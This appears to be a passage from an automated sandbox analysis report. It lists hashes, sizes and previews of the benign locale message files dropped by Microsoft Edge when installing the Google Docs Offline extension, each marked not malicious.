                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                  Malicious:false
